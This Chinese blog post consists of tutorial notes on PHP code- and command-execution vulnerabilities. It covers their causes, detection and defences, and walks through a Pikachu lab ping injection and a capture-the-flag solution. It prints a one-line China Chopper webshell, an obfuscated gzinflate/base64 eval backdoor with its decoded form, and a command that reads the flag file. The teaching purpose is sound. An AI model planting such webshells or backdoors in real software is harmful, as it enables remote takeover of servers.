RCE漏洞以及命令执行漏洞

最新推荐文章于 2024-05-12 21:52:27 发布
最新推荐文章于 2024-05-12 21:52:27 发布
阅读量538 收藏 1
点赞数
分类专栏: 渗透领域篇 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52657559/article/details/128208148
版权

目录

概念 

代码执行和命令执行区别

代码执行漏洞特点

命令执行漏洞特点

漏洞形成条件

漏洞产生地方 

如何检测漏洞

白盒情况下

黑盒情况下

防御方案

变量过滤或固定

WAF产品防火墙防护

敏感函数禁用

PHP:

python:

Java:

命令执行函数

拓展

菜刀一句话代码原理

案例演示

pikachu靶场黑盒功能点命令执行——应用功能

墨者白盒代码及命令执行——代码分析

案例补充知识点: 加密的带有echo

概念 

这里引用小迪的话:
        在Web应用中有时候程序员为了考虑灵活性、简洁性、会将代码调用代码或者命令执行函数进行调用进行处理。比如当应用在调用一些能将字符串转换为代码的函数的时候,没有考虑用户是否能够控制这个字符串,将造成代码执行漏洞。

代码执行和命令执行区别

代码执行漏洞特点

基于脚本,根据由对应编写的脚本产生不同的危害,如php执行出php命令,Java则是Java命

eval函数调用输入是字符变为代码执行

此时网页将其传递的参数

http://192.168.248.129:801/RCE.php?x=phpinfo();

在代码中所执行的是:

$code=phpinfo();     eval(phpinfo(); ); #eval会将()中的以代码进行解析而不是字符串

system函数调用系统命令

命令执行漏洞特点

基于系统,根据使用的系统产生不同的危害,Windows执行Windows命令,Linux执行Linux命令

system函数调用的是系统命令 

 此时相当于cmd命令行内输入ipconfig如果是Linux系统则是ifconfig

漏洞形成条件

两个条件缺一不可

可控变量:可以控制的变量为可控变量,比如通过网址的一个传参,通过参数值改变变量值

通俗来说就是能够输入自己写的一些数据 

漏洞函数:指的是哪个函数对这个变量进行操作,如:eval

好比:上传函数对应文件上传,查询函数对应sql注入,输出函数对应XSS

另外这种漏洞出现的机率取决于网站的应用特性或带有使用的功能

所以在进行找这种漏洞的时候

如果网站只是单纯的一个展示网站,没有其他的查询接口和服务,出现代码执行的漏洞概率不大

漏洞产生地方 

漏洞产生不只在编写网页的时候可能存在,同时在中间件,框架还有一些cms等插件程序也是存在

对于插件,框架,cms这些开源的直接到网上进行查找就可以进行复现

web程序源码

中间件平台

其他框架漏洞

如何检测漏洞

白盒情况下

通过代码审计进行查看源代码进行查看

黑盒情况下

漏洞扫描工具:AWVS、Appscan、Nessus

公开漏洞:网上会曝出漏洞,如果网上中有曝出相同的网站漏洞进行利用

源码漏洞,框架漏洞,中间件漏洞

手工看参数及功能点:根据对方的参数值和功能点进行查找,

查看某一个变量参数和使用的脚本语言有相关,实战中会遇到加密

 

防御方案

变量过滤或固定

代码执行是多样性的,不像sql注入一样存在固定的关键字,可以使用各种函数进行代替

所以过滤变量值不显示,可以改为固定变量值。

只允许使用某一种命令

WAF产品防火墙防护

找到市面上的一些安全产品进行防护

敏感函数禁用

PHP:

eval:把字符串作为php进行执行

assert:断言

call_user_func():把第一个参数作为回调参数

call_user_func_array():调用回到函数,并把第一个数组参数作为回到函数的参数

array_map():为数组的每个元素应用回调参数

python:

exec

Java:

Java中没有类似php中的eval函数可以直接将字符串转为代码进行执行的函数

但是存在反射机制,OGNL、SpEL等(存在相关利用的功能)

命令执行函数

system():执行外部程序并输出显示

exec():执行一个外部程序

shell_exec():通过shell环境执行命令,并将完整的输出以字符串的方式返回

passthru():执行外部命令并显示原始输出

pcntl_exec():在当前进程空间执行指定程序

``反引号():

<?php
echo `abc`;
?>

拓展

菜刀一句话代码原理

<?php @eval($_POST['Z']);?>

 原理:

菜刀将一些执行的数据包写到根据工具里面,然后利用密码传参点进行收发控制

eval会将传递的数据包以代码进行执行

通俗来说就是:操作变为数据包,然后数据包通过密码进行发送

案例演示

pikachu靶场黑盒功能点命令执行——应用功能

发现存在可以用于ping服务器通信,可能存在系统命令执行漏洞

另外:此时ping的是他的本机地址,同时也可能存在SSRF漏洞

进行分析可控变量,是否满足条件,发现是可以自由输入是可行的

 进行信息收集验证是属于Linux系统还是Windows系统

发现为window系统

 此时我们就利用Windows的多命令执行,发现这里是存在漏洞的

Windows下如何一次运行多个命令_天王的博客-CSDN博客_windows执行多条命令

 此后我们就可以对其进行后续的渗透

墨者白盒代码及命令执行——代码分析

 此时我们拿到该网页的一个源代码

 eval函数是一个代码输入的函数,此时这里可能是存在代码执行漏洞

我们此时将原来的eval函数更改为echo输出函数,将输入的改成输出原来的字符

<?php
eval(gzinflate(base64_decode(&40pNzshXSFCJD3INDHUNDolOjE2wtlawt+MCAA==&)));
?>

 由于是解密,所以&符号也要根变为’

<?php
echo gzinflate(base64_decode('40pNzshXSFCJD3INDHUNDolOjE2wtlawt+MCAA=='));
?>

此时在php环境得到输出结果为

echo `$_REQUEST[a]`;; ?>

 而request函数则是一个接受参数的函数,接受get,post和cookie的变量数据

此时就相当于

那么得知接受参数名为a,并且由request函数接受满足可控变量,eval能够带入代码进行执行

eval(echo `$_REQUEST[a]`;; ?>)

 此时利用变量a进行传参,列出当前文件

通过数据包发现是属于Linux系统

那么我们将使用tac命令对其读取文件,获取里面的内容,拿到flag

  如果是Windows系统则是cat

cat<key_120672328426179.php

 

案例补充知识点: 加密的带有echo

此处的echo并非是自己更换的echo

而是解密之后自带的echo,我们换成print输出也是带有echo输出

 

 他是存在于

gzinflate(base64_decode('40pNzshXSFCJD3INDHUNDolOjE2wtlawt+MCAA=='));

当加上echo之后是命令执行,而不存在echo的情况下是代码执行 

名词解释:

poc:验证代码

exp:利用漏洞

本文章仅供学习交流

ZRIP
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Java代码审计rce漏洞
m0_55772907的博客
11-15 807
代码审计
命令执行——命令执行漏洞概述(一)
Gjqhs的博客
03-01 1461
普及内容 了解命令执行定义 了解命令执行条件 掌握命令执行成因 了解命令执行危害 掌握命令执行实例 掌握管道符号和通用命令符 了解命令执行常见场景 基础概念 命令执行定义 基本定义 命令执行漏洞是指攻击者可以随意执行系统命令,分为远程命令执行(远程代码执行)和系统 命令执行两类 原理 程序应用有时需要调用一些执行系统命令的函数,如PHP中的system、exec、shell_exec、passthru、popen、proc_popen等,当用户能控制这些函数中的参数时,就可以将恶意系统命 令拼接到正
Java RMI SERVER命令执行漏洞
最新发布
m0_62670778的博客
05-12 380
RMI全称是Remote Method Invocation(远程方法调用),是专为Java环境设计的远程方法调用机制,远程服务器提供API,客户端根据API提供相应参数即可调用远程方法由此可见,使用RMI时会涉及到参数传递和结果返回,参数为对象时,要求对象可以被序列化。
java rce漏洞原理_rce漏洞 远程代码执行 简介
weixin_42467634的博客
02-27 1782
1)什么是远程代码执行远程命令执行 英文名称:RCE (remote code execution),简称RCE漏洞,是指用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令,可能会允许攻击者通过改变 $PATH 或程序执行环境的其他方面来执行一个恶意构造的代码。2)远程代码执行的特点远程代码执行是指攻击者可能会通过远调用的方式来攻击或控制计算...
Pikachu靶场——远程命令执行漏洞(RCE)
来日可期的博客
10-05 1966
远程命令执行(Remote Code Execution,RCE)是一种安全漏洞,攻击者可以通过该漏洞在远程服务器上执行恶意代码或命令RCE 漏洞通常出现在应用程序或操作系统中,由于不正确的输入验证或处理而导致。一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口,比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上,一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。 如果设计者在
【pikachu皮卡丘渗透测试靶场】远程命令、代码执行漏洞原理及案例演示
algae
04-17 2177
37.6-1 远程命令、代码执行漏洞原理及案例演示(Av96582332,P37) RCE(remote command/code execute)概述 RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 远程系统命令执行 一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口 ...
LOG4J RCE 漏洞分享与自查.pdf
12-15
LOG4J RCE 漏洞分享与自查 Log4j RCE 漏洞是近期爆发的一种高危漏洞,它影响了全球许多业务线,原因在于引入的 Log4j2 2.10.0 版本中存在的漏洞。本文将详细介绍 Log4j RCE 漏洞的成因、漏洞复现、检测方法和解决...
第30天:WEB漏洞-RCE代码及命令执行漏洞全解1
08-03
WEB 漏洞-RCE 代码及命令执行漏洞全解在 Web 应用中有时候程序员为了考虑灵活性、简洁性,会在代码调用代码或命令执行函数去处理。比如当应用在调用一些能将
pikachu之RCE漏洞
qq_42728977的博客
12-24 1059
ping 小看一下后台源码,如下 构造,www.baidu.com && dir 显示这个,说明dir命令执行。 eval 小看一下源码 输入phpinfo(); rce修复 尽量少用eval、exec此类危险函数,对用户输入严格采用白名单。 ...
java审计-RCE审计
admin741admin的博客
04-13 463
RCE 的中文名称是远程命令执行,指的是攻击者通过Web 端或客户端提交执行命令,由于服务器端没有针对执行函数做过滤或服务端存在逻辑漏洞,导致在没有指定绝对路径的情况下就可以执行命令RCE 漏洞的原理其实也很简单,就是通过开发人员没有针对代码中可执行的特殊函数或自定义方法入口做过滤,导致客户端可以提交恶意构造语句,并交由服务器端执行
rce漏洞 远程代码执行 简介
whatday的专栏
09-02 7355
0x00 远程代码执行 - 介绍 1)什么是远程代码执行 远程命令执行 英文名称:RCE (remote code execution),简称RCE漏洞,是指用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令,可能会允许攻击者通过改变 $PATH 或程序执行环境的其他方面来执行一个恶意构造的代码。 2)远程代码执行的特点 远程代码执行...
Pikachu漏洞靶场 RCE(远程命令执行/代码执行)
柠檬i的博客
04-05 1461
RCE(remote command/code execute)概述 RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 远程系统命令执行 一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口
渗透测试总结(pikachu靶场为例,漏洞介绍、发生位置、常见危害、形成原因、代码分析、测试流程、漏洞分类及试验、防范措施)持续更新中。
qq_37776764的博客
05-06 1398
渗透测试总结(pikachu靶场为例,漏洞介绍、发生位置、常见危害、形成原因、代码分析、测试流程、漏洞分类及试验、防范措施)持续更新中。
RCE代码及命令执行漏洞全解(30)
san3144393495的博客
05-31 625
代码执行是围绕着脚本语言来讲的,如果是php的脚本,就能执行出php的一些脚本命令java网站的就执行java的脚本命令。比如当应用在调用一些能将字符串转化成代码的函数时,没有考虑用户是否能够控制这些字符串,将代码执行漏洞,同样调用系统命令处理,将造成命令执行漏洞。危害是执行系统命令,系统命令就是命令提示符可以执行出来的语句,比如ip config就能查询到电脑的IP,系统命令可以做很多事情,影响到电脑。漏洞的产生分两种情况,第一种情况是根据现实的应用情况,第二种情况是网站代码里面的情况,
基于pikachu的漏洞学习(三)完结
网络安全学习
04-10 1277
文章目录命令执行&&代码执行文件包含文件上传越权反序列化XXESSRF不安全的url跳转其它 命令执行&&代码执行 原理也是之前说过n次的,观察下面的输入 这是一个ping IP的接口,我们结束一个命令,添加一个命令,&&作为分隔符 就会返回相应的结果 下一个是个eval函数,php的执行命令的函数,输入phpinfo() 没什么多说的,就是提供的接口就是执行命令&代码的,但是没有限制能执行哪些命令 文件包含 文件包含主要是代码复用用的到的,像是网
Java代码审计之命令执行漏洞
悦分享
08-02 857
执行了ls&&结果报错,看显示结果发现过滤了&&,然后把&转编码发现还是会报错,但是从服务端代码来看并没有做参数的过滤。从代码中可以看出来程序只使用trim()方法对jdk进行了两遍的空格过滤,然后直接和后面拼接的命令一起执行。上面的代码显示jdk这个参数是从请求中获取的,看到这里已经能确定是个命令执行漏洞了,下面我们来利用这个漏洞。可以看到这里依次调用了3个命令执行的方法,如果命令都能成功执行的话,可以执行3次。进行代码审计时遇到一个比较典型命令执行漏洞,适合新手学习,给大家分享下整个过程。...
RCE绕过的简介以及常见的绕过方式(个人学习笔记)
2302_80935968的博客
03-28 858
1.目录分隔符被过滤后,无法通过cat等查看目录的命令直接读取文件夹的目录里的PHP文件,而是需要先进入该文件夹(查看文件夹目录),再通过cat读取PHP文件的内容。进入题目,查看源代码,为php函数,该函数意思为:判断是否有变量cmd,如果有,则执行eval($_REQUEST[‘cmd’]);查看网页信息,该题对注入的命令无任何过滤,且当输入ip的时候,cmd会执行ping命令,尝试ping 127.0.0.1 | ls ,可以正常连接。命令 system():执行系统命令并输出执行结果。
远程代码执行漏洞RCE原理
03-28
远程代码执行漏洞(Remote Code Execution,RCE)是指攻击者通过利用程序或系统中的漏洞,成功地在远程主机上执行自己编写或者上传的恶意代码。攻击者可以利用这个漏洞执行系统命令、上传或下载文件、获取敏感信息等...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值